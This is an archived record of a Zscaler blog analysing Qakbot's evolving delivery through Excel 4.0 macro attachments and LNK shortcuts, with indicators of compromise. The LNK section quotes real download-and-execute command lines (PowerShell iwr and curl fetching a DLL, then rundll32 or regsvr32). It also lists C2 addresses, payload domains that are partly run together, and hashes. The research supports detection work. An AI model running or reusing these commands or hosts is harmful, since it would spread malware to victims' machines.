{
	"id": "940befac-3ddc-46fa-9f55-eb57a2d62651",
	"created_at": "2026-04-06T00:09:47.018567Z",
	"updated_at": "2026-04-10T03:24:29.68749Z",
	"deleted_at": null,
	"sha1_hash": "f2307965cd95d3b45f9443322777cb644f7e5ee0",
	"title": "Qakbot Attacks Increasing due to Evolving Threats | Zscaler",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2560703,
	"plain_text": "Qakbot Attacks Increasing due to Evolving Threats | Zscaler\r\nBy Tarun Dewan, Aditya Sharma\r\nPublished: 2022-07-12 · Archived: 2026-04-05 17:40:12 UTC\r\nActive since 2008, Qakbot, also known as QBot, QuackBot and Pinkslipbot, is a common trojan malware\r\ndesigned to steal passwords. This pervasive threat spreads using an email-driven botnet that inserts replies in\r\nactive email threads. Qakbot threat actors are also known to target bank customers and use the access they gain\r\nthrough compromised credentials to spy on financial operations and gain valuable intel. \r\nSummary\r\nQakbot has been a prevalent threat over the past 14 years and continues to evolve adopting new delivery vectors to\r\nevade detection. Zscaler Threatlabz has discovered a significant uptick in the spread of Qakbot malware over the\r\npast six months using several new techniques. Most recently, threat actors have transformed their techniques to\r\nevade detection by using ZIP file extensions, enticing file names with common formats, and Excel (XLM) 4.0  to\r\ntrick victims into downloading malicious attachments that install Qakbot. Other more subtle techniques are being\r\ndeployed by threat actors to prevent automated detection and raise the odds that their attack will work, including\r\nobfuscating code, leveraging multiple URLs to deliver the payload, using unknown file extension names to deliver\r\nthe payload, and altering the steps of the process by introducing new layers between initial compromise, delivery,\r\nand final execution.\r\nEmbedded as commonly-named attachments, Qakbot leverages ZIP archive file having embedded files such as\r\nMicrosoft Office files, LNK, Powershell, and more. The screenshot in Fig. 1 below reveals a snapshot view of the\r\nspikes in Qakbot activity observed over the past six months.\r\nFigure1: Qakbot monitored during last 6 months in Zscaler Threatlabz\r\nZscaler automatically identifies and blocks files containing Qakbot malware for our customers, and provides them\r\nwith the best possible solution to manage this evolving threat.\r\nAs an extra precaution against these types of threats, Zscaler recommends that organizations formally train users\r\nnot to open email attachments sent from untrusted or unknown sources and encourage users to verify URLs in\r\ntheir browser address bar before entering credentials.\r\nThe Zscaler ThreatLabz team will continue to monitor this campaign, as well as others to help keep our customers\r\nsafe and share critical information with the larger SecOps community to help stop the spread of active threats like\r\nQakbot and protect people everywhere. The following sections dive into an in-depth analysis of this evolving\r\nhttps://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques\r\nPage 1 of 20\n\nthreat and provide actionable indicators that security professionals can apply to identify and block Qakbot in their\r\nenvironments.\r\nTechnical analysis of evolving Qakbot techniques\r\nThreatLabz has observed threat actors using various different file names to disguise attachments designed to\r\ndeliver Qakbot. Using common file naming formats that include a description, generated numbers, and dates, the\r\nfiles feature common keywords for finance and business operations, including compensation figures, metric\r\nreports, invoices and other enticing datasets. To the unsuspecting victim, these types of files may either appear like\r\neveryday items for business as usual or as a rare opportunity to look at data they would not normally see. Either\r\nway, the victim is likely to fall for the sense of urgency at a fresh data set or request and click the file to learn\r\nmore about what is inside and how it pertains to them.\r\nMalicious file name examples:\r\nCalculation-1517599969-Jan-24.xlsb\r\nCalculation-Letter-1179175942-Jan-25.xlsb\r\nClaimDetails-1312905553-Mar-14.xlsb\r\nCompensation-1172258432-Feb-16.xlsb\r\nCompliance-Report-1634724067-Mar-22.xlsb\r\nContractCopy-1649787354-Dec-21.xlsb\r\nDocumentIndex-174553751-12232021.xlsb\r\nEmergReport-273298556-20220309.xlsb\r\nPayment-1553554741-Feb-24.xlsb\r\nReservationDetails-313219689-Dec-08.xlsb\r\nService-Interrupt-977762469.xlsb\r\nSummary-1318554386-Dec27.xlsb\r\nAnalyzing the de-obfuscated code exposes how these malicious attachments use XLM 4.0 to hide their macros\r\nand evade detection by static analysis tools and automated sandboxes. Looking back over the past six months, our\r\nresearchers observed a different kind of emails templates and standardized Office templates which are being used\r\nand changed only slightly in nearly all of the analyzed Qakbot samples. \r\nEmail Templates:\r\nhttps://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques\r\nPage 2 of 20\n\nhttps://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques\r\nPage 3 of 20\n\nFigure 2 : Standard Email and Office templates used for Qakbot delivery in last six months\r\nThe following section provides a month by month overview of changes observed in Qakbot samples from\r\nDecember 2021 - May 2022:\r\nAttack Chain\r\nhttps://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques\r\nPage 4 of 20\n\nFigure 3: Diagram of Qakbot delivery and execution via Microsoft Office attachments\r\nDecember 2021: Qakbot XLM 4.0 snippet [Md5: 58F76FA1C0147D4142BFE543585B583F]\r\nOnce the user clicks “Enable Content” to view the attachment, the macro is activated to look for a subroutine with\r\na pre-defined function, in this case starting with auto_open777777. In the next step of the sequence, the\r\nURLDownloadToFile function is imported and called to download  the malicious Qakbot Payload and drop it into\r\nthe C:\\ProgramData\\ location on the victim’s machine with the filename .OCX which is actually Qakbot DLL.\r\nThen WinAPI EXEC from Excel4Macro directly executes the malicious payload or loads the payload using\r\nregsvr32.exe.\r\nFigure 4: Qakbot XLM 4.0 snippet from December 2021\r\nJanuary 2022: Qakbot XLM 4.0 snippet [Md5: 4DFF0479A285DECA19BC48DFF2476123]\r\nIn the following snippet it executes macro code which is present in the cells from a hidden sheet named\r\n‘EFFWFWFW'. This creates a  REGISTER and consistently calls functions to be performed, except in this\r\nexample the threat actor has evolved the action to avoid detection via obfuscation. \r\nhttps://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques\r\nPage 5 of 20\n\nFigure 5: Qakbot  XLM 4.0 snippet from January 2022\r\nFebruary 2022: Qakbot XLM 4.0 snippet [Md5: D7C3ED4D29199F388CE93E567A3D45F9]\r\nMalware author leave code mostly unmodified. Create a folderOne using CreateDirectoryA WinAPI as shown\r\nin the following snapshot “C:\\Biloa”.\r\nFigure 6: Qakbot  XLM 4.0 snippet from February 2022\r\nMarch 2022: Qakbot XLM 4.0 snippet [Md5: 3243D439F8B0B4A58478DFA34C3C42C7] \r\nObserved change in the file system persistence level.\r\nChange in payload drop location from C:\\ProgramData\\ to C:\\Users\\User\\AppData\\Local\\\r\n[random_folder_name]\\random.dll\r\nLess obfuscation and code is much more readable.\r\nUsed option-s with regsvr32.exe so that it can install silently without prompting any kind of message. \r\nFigure 7: Qakbot  XLM 4.0 snippet from March 2022\r\nhttps://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques\r\nPage 6 of 20\n\nApril 2022: XLM 4.0 snippet [Md5: 396C770E50CBAD0D9779969361754D69]\r\nA new change is the observation of fully de-obfuscated code in Qakbot attachments. A similarity observed across\r\nQakbot variants is the use of multiple URLs that can deliver the malicious payload, so that if any one URL goes\r\ndown or is blocked, then the payload can still be delivered by another available URL. Additionally, it is common\r\nto see threat actors trying to evade detection from automated security scans by using unknown extensions on\r\ndropped payloads such as OCX, ooccxx, .dat, .gyp, and more.\r\nFigure 8: Qakbot  XLM 4.0 snippet from April 2022\r\nMay: Qakbot XLM 4.0 snippet [Md5: C2B1D2E90D4C468685084A65FFEE600E]\r\nObserved change in the filename to ([0-9]{2,5}\\.[0-9]{4,12}\\.dat]. Additionally, Instead of 4-5 different download\r\npayload URLs, only one Qakbot download URL is identified.\r\nFigure 9: Qakbot  XLM 4.0 snippet from May 2022\r\nFigure 10: Zscaler Sandbox Report Qakbot deliver by Malicious office attachment\r\nSpreading factor through LNK files:\r\nhttps://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques\r\nPage 7 of 20\n\nAttack Chain\r\nFigure 11: Qakbot delivery and execution through LNK file\r\na) May 2022: Qakbot snippet of LNK file\r\nObserved increase using the shortcut LNK filetype source with names like:  \r\nreport[0-9]{3}\\.lnk\r\nreport228.lnk\r\nreport224.lnk\r\nObserved change using powershell.exe to download the malware payload. \r\nObserved change and a clear sign of Qakbot evolving to evade updated security practices and defenses by loading\r\nthe dll payload through rundll32.exe instead of regsvr32.exe.\r\nArgument: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoExit iwr -Uri\r\nhttps://oleitikocottages.com/r4i9PRpVt/S.png -OutFile $env:TEMP\\766.dll;Start-Process rundll32.exe\r\n$env:TEMP\\766.dll,NhndoMnhdfdf\r\nb) June 2022: Qakbot snippet of LNK file\r\nObserved change in execution flow and name of file name both change on LNK file type. Regsvr32.exe used\r\nwhile qakbot dll loading and injects to explorer.exe as well for communication to command and control server.\r\nObserved file names using the {5[0-9]{7,10}_[0-9][6,8]}\\.lnk} LNK file type:\r\n51944395538_1921490797.zip\r\nhttps://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques\r\nPage 8 of 20\n\n52010712629_1985757123.zip\r\n52135924228_164908202.zip\r\n51107204327_175134583.zip\r\nArgument: 'C:\\Windows\\system32\\cmd.exe C:\\Windows\\System32\\cmd.exe /q /c echo 'HRTDGR' \u0026\u0026 MD\r\n\"%ProgramData%\\Username\" \u0026\u0026 curl.exe -o %ProgramData%\\Username\\filename.pos\r\n91.234.254.106/%random%.dat \u0026\u0026 ping -n 2 localhost \u0026\u0026 echo \"MERgd\" \u0026\u0026 echo \"NRfd\" \u0026\u0026 regsvr32\r\n'C:\\ProgramData\\Username\\filename.pos'\r\nThrough command prompt it downloads a payload and drops the file on the victim’s machine with a curl\r\ncommand. Here are some observed examples of the process:\r\nCMD.EXE :\r\n/q     : Turns the echo off.\r\n/c     : Carries out the command specified by string and then stops.\r\nCURL.EXE :\r\n/o: Write to file\r\nAfter that it loads the downloaded dll payload through regsvr32.exe and injects into the explorer.exe. Then\r\nperforms further operations, including:\r\nChecks for the presence of antivirus software.\r\nCreates a RUN key for persistence in the system.\r\nCreates scheduled tasks to execute the payload at a specific time.\r\nFigure 12: Zscaler Sandbox Report Qakbot deliver by LNK\r\nMore details on these findings are covered in the ThreatLabz Qakbot vectors blog.\r\nDownloaded Qakbot DLL: 529fb9186fa6e45fd4b7d2798c7c553c from above mentioned LNK file.\r\nhttps://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques\r\nPage 9 of 20\n\nThe entry point of the executable is fully obfuscated using duplicate MOV operations.\r\nFigure 13: Obfuscated entry point\r\nThe following screenshot shows junk code obfuscating the script used to decode the payload.\r\nhttps://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques\r\nPage 10 of 20\n\nFigure 14: Code snippet for decoding the payload\r\nChecks for Windows Defender Emulation using WinAPI GetFileAttributes “C:\\INTERNAL\\__empty”.\r\nFigure 15: Payload checking GetFileAttributesW\r\nThe sample also uses some flags like SELF_TEST_1 which appear to be for debugging purposes. \r\nhttps://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques\r\nPage 11 of 20\n\nFigure 16: Setting flag for debugging purpose\r\nFigure 17: Zscaler Sandbox report for Qakbot DLL\r\nZscaler's multilayered cloud security platform detects indicators, as shown below:\r\nLNK.Downloader.Qakbot\r\nVBA.Downloader.Qakbot\r\nThe following details can be found in the Qakbot configuration file which we examined connecting to the server\r\nthrough explorer.exe.\r\nBOTNET ID: Obama188\r\n[+] C2 IPs:\r\n1.161.123.53\r\n101.108.199.194\r\n102.182.232.3\r\n103.116.178.85\r\n103.207.85.38\r\n104.34.212.7\r\n106.51.48.170\r\n108.60.213.141\r\n109.12.111.14\r\nhttps://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques\r\nPage 12 of 20\n\n109.178.178.110\r\n111.125.245.116\r\n117.248.109.38:21\r\n120.150.218.241\r\n120.61.2.215\r\n121.7.223.45\r\n124.40.244.115\r\n140.82.49.12\r\n140.82.63.183\r\n143.0.219.6\r\n144.202.2.175\r\n144.202.3.39\r\n148.0.56.63\r\n148.64.96.100\r\n149.28.238.199\r\n172.115.177.204\r\n173.174.216.62\r\n173.21.10.71\r\n174.69.215.101\r\n175.145.235.37\r\n176.205.23.48\r\n176.67.56.94\r\n177.209.202.242\r\n177.94.57.126\r\n179.158.105.44\r\n180.129.108.214\r\nhttps://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques\r\nPage 13 of 20\n\n182.191.92.203\r\n186.90.153.162\r\n187.207.131.50\r\n187.251.132.144\r\n189.146.87.77\r\n189.223.102.22\r\n189.253.206.105\r\n189.37.80.240\r\n189.78.107.163\r\n190.252.242.69\r\n191.112.4.17\r\n191.34.120.8\r\n193.136.1.58\r\n196.203.37.215\r\n197.87.182.115\r\n197.94.94.206\r\n201.145.165.25\r\n201.172.23.68\r\n201.242.175.29\r\n208.101.82.0\r\n208.107.221.224\r\n210.246.4.69\r\nIndicators of Compromise\r\n[+] Payload URLs:\r\nanukulvivah.comnobeltech[.]com.pk\r\ngriffinsinternationalschool.intierrasdecuyo[.]com.ar\r\ntajir[.]comdocumentostelsen[.]com\r\nhttps://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques\r\nPage 14 of 20\n\nwrcopias[.]com.brls[.]com.co\r\ndk-chic[.]combendhardwoodflooring[.]com\r\nstalwartnv[.]comdelartico[.]com\r\nnewportresearchassociates[.]comjindalfabtex[.]com\r\nsoftwarela.orgasesorescontables[.]com.py\r\nsegurabr[.]com.brrenty.biz\r\nhams.psalrabbat[.]com\r\nglistenworld[.]comsonalifecare[.]com\r\nact4dem.netbrandxo.in\r\nstuttgartmed[.]comgmstrust.in\r\nact4dem.netglistenworld[.]com\r\nananastours[.]comhostingdeguatemala[.]com\r\ngmsss45c[.]comasiatrendsmfg[.]com\r\nfacturamorelos[.]comjnpowerbatteries[.]com\r\nminimean[.]com1031taxfreexchange[.]com\r\npbxebike[.]comhigradeautoparts[.]com\r\nparkbrightworldwideltd[.]comams.org.co\r\nbaalajiinfotechs[.]commomoverslegypte[.]com\r\nrecetasparaelalmapanama[.]comghssarangpur.org\r\nwecarepetz[.]com.brbrothersasian[.]com\r\nknapppizzabk[.]comwecarepetz[.]com.br\r\njeovajirelocacao[.]com.br7n7u.tk\r\namdpl.indabontechnologies.co.ke\r\nbouncehouserentalmiami.netmahasewanavimumbai[.]com\r\nhotelsinshillong.inbrothersasian[.]com\r\ntamiltechhints[.]comitaw-int[.]com\r\ntvtopcultura[.]com.brmadarasapattinam[.]com\r\ndesue.mxautocadbeginner[.]com\r\nantwerpdiamond.netmarciomazeu.dev.br\r\nifongeek[.]comtunaranjadigital[.]com\r\navaniamore[.]comthecoursecreators[.]com\r\nthecoursecreators[.]comdrishyamopticals[.]com\r\nthewebinarchallenge[.]comiammyprioritylive[.]com\r\nerekha.invegascraftbeertour[.]com\r\nrommify.orgpbsl[.]com.gh\r\nsathyaunarsabha.orgcourtalamarivuthirukovil.org\r\npbsl[.]com.ghapk.hap.in\r\noutsourcingmr[.]comofferlele[.]com\r\ncourtalamarivuthirukovil.orgelchurritorojas[.]com\r\napk.hap.inklicc.co.tz\r\njinglebells.ngthebrarscafe[.]com\r\nbigtv3d.inretroexcavaciones[.]com\r\nhttps://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques\r\nPage 15 of 20\n\naimwithnidhi.invizionsconsulting[.]com\r\ngaurenz[.]comamarelogema[.]com.br\r\nwiredcampus.inretroexcavaciones[.]com\r\nelchurritorojas[.]comglobalwomenssummit2020[.]com\r\nbyonyks[.]comwfgproduction[.]com\r\nwfgproduction[.]comciit.edu.ph\r\nreachprofits[.]comcreativecanvas.co.in\r\nvegascraftbeertour[.]comnightsclub[.]com\r\nassistenciatecnicaembh24h[.]com.brtheinfluencersummit2021[.]com\r\ngrupoumbrella[.]com.brbjfibra[.]com\r\nfra[.]com.arthewebinarstore[.]com\r\nwriteright.inaaafilador.eu\r\nwlrinformatica[.]com.brminahventures[.]com\r\nalternativecareers.inwvquali[.]com.br\r\naaafilador.eueventbriteclone.xyz\r\npolicepublicpress.inmarcofoods.in\r\nlongwood-pestcontrol[.]comlifecraze.in\r\nviasalud.mxecsshipping[.]com\r\nmisteriosdeldesierto.pelgfcontabilidade[.]com.br\r\nmariebeeacademy[.]commuthumobiles[.]com\r\nteamone[.]com.satechmahesh.in\r\nwiredcampus.inteamone[.]com.sa\r\nfurnitureion[.]comekofootball[.]com\r\ncomunidadecristaresgate[.]com.bryqsigo[.]com\r\nmysuccesspoint.inkriworld.net\r\nwiredcampus.intheinfluencerlaunch[.]com\r\nmi24securetech[.]compalconsulting.net\r\nattalian[.]comrudrafasteners[.]com\r\nfilmandtelevisionindia[.]comcloudberrie[.]com\r\nbrikomechanical[.]comideiasnopapel[.]com.br\r\nneovation.sgatozinstrument[.]com\r\ntecnobros8[.]comwalnut.ae\r\nbrikomechanical[.]comleaoagronegocios[.]com.br\r\nsonhomirim[.]com.brwlrinformatica[.]com.br\r\nwbbvet.ac.inboostabrain.in\r\nnarendesigns[.]comsla[.]com.ng\r\nrstkd[.]com.brdelacumbrefm[.]com\r\nleaoagronegocios[.]com.brdegreesdontmatter.in\r\nstrategicalliances.co.inlelokobranding.co.za\r\nmetrointl.netrajkotbusiness.in\r\ntitanhub.co.ukgrupothal[.]com.br\r\nwww.centerplastic[.]com.brpawnest[.]com\r\nhttps://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques\r\nPage 16 of 20\n\nrightsupportmanagement.co.uksmiletours.net\r\nleaseicemachine[.]comsegiaviamentos[.]com.br\r\nvirtualexpo.cactusfuturetech[.]comautovidriosrobin.anuncio-ads.cl\r\nklearning.co.ukbestbuidan.mn\r\namicodelverde[.]comhunbuzz[.]com\r\nprova.gaia.srlprodotti.curadelprato[.]com\r\nprodotti.curadelprato[.]comdomenico[.]com.co\r\nanukulvivah[.]comahmedabadpolicestories[.]com\r\nec.meticulux.netpent.meticulux.net\r\nclerbypestcontrolllp.inorderingg.in\r\nrylanderrichter[.]comtajir[.]com\r\nsearchgeo.org4md-uae[.]com\r\nmatjarialmomayz[.]comformularapida[.]com.br\r\ncarnesecaelpatron[.]com.mxbengallabourunion[.]com\r\nalphanett[.]com.brragvision[.]com\r\nsecunets.co.keflameburger[.]com.mx\r\ngph.lkabingdonhomes[.]com\r\nagteacherscollege.ac.insis.edu.gh\r\nimpexlanka[.]comludoi[.]come.xyz\r\nmufinacademy[.]com1031oilgasexchange[.]com\r\nindexpublicidade[.]com.brhullriverinternationalltd[.]com\r\nsrgsdelhiwest[.]comproyectostam[.]com\r\nwaitthouseinc.orggomax.mv\r\necotence.in.nettriplenetleaseproperty[.]com\r\nbrunocesar.meonlywebsitemaintenance[.]com\r\nlbconsultores[.]com.cokindersaurus.in\r\nguitarconnectionsg[.]comguestpostmachine[.]com\r\nbagatiparamohiladegreecollege.edu.bdguitarconnectionsg[.]com\r\nwaitthouseinc.orgofferlele[.]com\r\ncuddlethypet[.]comsrimanthexports[.]com\r\nespetinhodotom[.]comluxiaafinishinglab[.]com\r\ngreyter[.]commoodle-on[.]com\r\nniramayacare.inmakazadpharmacy[.]com\r\nnetleasesale[.]comnathanflax[.]com\r\nerimaegypt[.]comclashminiwiki[.]com\r\ntopfivedubai[.]comskyorder.net\r\nprofitsbrewingnews[.]commotobi[.]com.bd\r\npolistirolo.orgpalashinternationals[.]com\r\nmayaconstructions.co.inmaexbrasil[.]com.br\r\nmzdartworkservicesllc[.]comwalmondgroup[.]com\r\nsaffroneduworld[.]comlacremaynaty[.]com.mx\r\nifongeek[.]comgrowscaleandprofit[.]com\r\nhttps://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques\r\nPage 17 of 20\n\ngetishdonelive[.]cominfluencerlaunches[.]com\r\napk.hap.incalldekesha[.]com\r\nvortex.cmspeakatiamp[.]com\r\nthewebinarclinic[.]comthewebinarchecklist[.]com\r\nsathyaunarsabha.orgoutsourcingmr[.]com\r\nwebdoweb[.]com.ngvortex.cm\r\nfuture-vision[.]com.trbrunalipiani[.]com.br\r\necotence.xyznimbus[.]com.qa\r\nwriteright.inlightnco.id\r\naidshivawareness.orgmetaunlimited.in\r\nhearingaidbihar[.]combarcalifa[.]com.br\r\ncondominiosanalfonso.cltimelapse.ae\r\noladobeldavida[.]com.brmarcofoods.in\r\nalternativecareers.inrsbnq[.]com\r\ncobblux.pktafonego.org\r\nchezmarblan[.]comcogitosoftware.co.in\r\ndevconstech[.]comcumipilek[.]com\r\ndaptec[.]com.brhydrical.mx\r\nindiacodecafe[.]comecsshipping[.]com\r\nskyorder.nettechmahesh.in\r\nassimpresaroma.itcampandvillas[.]com\r\nstyleavail[.]comomtapovan[.]com\r\nprogramandoavida[.]com.brindiacodecafe[.]com\r\nbruno-music[.]comlaoaseanhospital.la\r\nagbegypt[.]comcrimpwell.in\r\n1031wiki[.]comstrategicalliances.co.in\r\nnimbus[.]com.qavivanaweb[.]com.br\r\nofficeservicesjo.cfdinspiraanalytics.in\r\nshareyourcake.orgprotocolostart[.]com\r\nacertoinformatica[.]com.brinovex.in\r\ndevconstech[.]comdigizen.in\r\nrajkotbusiness.indigizen.in\r\nacertoinformatica[.]com.brrumbakids[.]com\r\nboostabrain.incsnglobal.co\r\nhaskekudla[.]comkraushop[.]com\r\nMahalaxmibastralayanx.inchuckdukas[.]com\r\n[+] Hashes\r\nXLSB:\r\n58F76FA1C0147D4142BFE543585B583F\r\n4DFF0479A285DECA19BC48DFF2476123\r\nhttps://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques\r\nPage 18 of 20\n\nD7C3ED4D29199F388CE93E567A3D45F9\r\n3243D439F8B0B4A58478DFA34C3C42C7\r\n396C770E50CBAD0D9779969361754D69\r\nC2B1D2E90D4C468685084A65FFEE600E\r\nLNK:\r\n54A10B41A7B12233D0C9EACD11036954\r\nE134136D442A5C16465D9D7E8AFB5EBE\r\n7D0083DB5FA7DE50E620844D34C89EFC\r\nC2663FCCB541E8B5DAA390B76731CEDE\r\nQakbot:\r\n529FB9186FA6E45FD4B7D2798C7C553C\r\n[+] Filenames:\r\nCalculation-1517599969-Jan-24.xlsb\r\nCalculation-Letter-1179175942-Jan-25.xlsb\r\nClaimDetails-1312905553-Mar-14.xlsb\r\nCompensation-1172258432-Feb-16.xlsb\r\nCompliance-Report-1634724067-Mar-22.xlsb\r\nContractCopy-1649787354-Dec-21.xlsb\r\nDocumentIndex-174553751-12232021.xlsb\r\nEmergReport-273298556-20220309.xlsb\r\nPayment-1553554741-Feb-24.xlsb\r\nReservationDetails-313219689-Dec-08.xlsb\r\nService-Interrupt-977762469.xlsb\r\nSummary-1318554386-Dec27.xlsb\r\nW_3122987804.xlsb\r\nA_1722190090.xlsb\r\nAO_546764894.xlsb\r\nNh_1813197697.xlsb\r\nLM_4170692805.xlsb\r\nreport228.lnk\r\nreport224.lnk\r\n51944395538_1921490797.zip\r\n52010712629_1985757123.zip\r\n52135924228_164908202.zip\r\n51107204327_175134583.zip\r\nhttps://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques\r\nPage 19 of 20\n\nExplore more Zscaler blogs\r\nSource: https://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques\r\nhttps://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques\r\nPage 20 of 20",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques"
	],
	"report_names": [
		"rise-qakbot-attacks-traced-evolving-threat-techniques"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434187,
	"ts_updated_at": 1775791469,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f2307965cd95d3b45f9443322777cb644f7e5ee0.pdf",
		"text": "https://archive.orkl.eu/f2307965cd95d3b45f9443322777cb644f7e5ee0.txt",
		"img": "https://archive.orkl.eu/f2307965cd95d3b45f9443322777cb644f7e5ee0.jpg"
	}
}